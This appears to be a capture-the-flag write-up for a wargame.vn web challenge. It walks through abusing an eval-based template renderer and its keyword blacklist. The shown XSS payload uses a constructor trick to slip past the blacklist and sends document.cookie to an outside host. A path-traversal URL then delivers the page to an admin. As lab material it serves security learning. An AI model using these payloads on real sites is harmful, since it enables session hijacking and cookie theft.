If we login as guest/guest, we find a page with template input textboxes.
Above that, we also see a feedback form to write out few details.

We also have decrypted	username and password for cookies.
---------------------
document.cookie
"username=guest; password=guest"
---------------------


We can now conclude that this question is obviously about XSS, since this is a website with html input available with sending stuff to admin.

Anyways, we firstly input the default values in the input box and submit.

----------------------------
HTML: (default)
PARAMS: (default)
http://challenges.wargame.vn:50004/template/41845810235ae981f0f8ed2d80580e7a)
-------------------------------------------

Let's have a look at the sourcecode of the template page.

-------------------------------------------
  setTimeout(function(){
		var html = document.getElementById('html').value;
		var params = (function(){
			var obj = JSON.parse(document.getElementById('params').value);
			return obj;
		})();
		console.dir(params);
		var render_tmpl = new tmpl(html,params);
		document.getElementById('result').innerHTML = render_tmpl.render();
	},300);

  function tmpl(content,params){
    String.prototype.header = function(){
      return "[header]"+this.toString()+"[/header]"
    }
    this.content = content;
    this.params = params || {};
    this.anti_xss = function(input){
      return input.toString()
            .replace(/&/g,'&amp;')
            .replace(/</g,'&lt;')
            .replace(/>/g,'&gt;')
            .replace(/'/g,'&#39;')
            .replace(/"/g,'&quot;')
    }
    this.filter_blacklist = function(input){
      var blacklist = /this|document|window|object|function|top|parent|eval|script|alert|prompt/gi
      // hm...
      return input.replace(blacklist,"..")
    }
    this.render = function(params){
      this.params = params || this.params;
      while(x = /<%=([\w\.\(\)]+)%>/g.exec(this.content)){
        eval("var p = this.params."+this.filter_blacklist(x[1]));
        this.content = this.content.replace(x[0],p);
      }
      return this.anti_xss(this.content)
          .replace(/\n/g,"<br />")
          .replace('[header]','<div class="page-header"><h1>')
          .replace('[/header]','</h1></div>'); // newline to br
    };
  }
-------------------------------------------

Yes.
there is nothing to talk about it. They have eval().
However, it has all these blacklisted stuff, and all I know is that we have to inject through that asp-like tags.

Searching some functions for while, we found out that we can call a function using constructor method.


If we input this console log for testing:
-------------------------------------------
HTML: <%=title.header.constructor(console.log(1))()%>
PARAM: (default)
=> http://challenges.wargame.vn:50004/template/a1e1ce29099ba4dbe3b4f168bae6bd62
-------------------------------------------
we get the value "1" from console log. This assures that there is a vulnerability for XSS.
As we go further, we realize that we can bypass the filters after the ASP-like tags.

so if we use some string functions like substr or indexOf, we can call javascript stuff within the constructor

so if we input this for xss stuff:
--------------------------------------------
HTML: <%=lol.header.constructor(html.value.substr(52))()%>document.location.href='http://stypr.com/xss.pl?xss='+document.cookie;
PARAM: {"lol":"penthackon"}
=> http://challenges.wargame.vn:50004/template/5656b0f5e5f86f9b23c1c2d7c517370e
--------------------------------------------
yes, it comes 404 page but it has been redirected to my website with the cookies on it.



Now, it's the feedback one.
they ask the Debug URL for any problem, but if we put
--------------------------------------------
http://challenges.wargame.vn:50004/debug/5656b0f5e5f86f9b23c1c2d7c517370e
--------------------------------------------
this won't work from server-side because this will only output as text file.

so, if we bypass using LFI methods we can successfully send the template page with the xss on it:
--------------------------------------------
http://challenges.wargame.vn:50004/debug/areyouserious/../../template/5656b0f5e5f86f9b23c1c2d7c517370e
--------------------------------------------

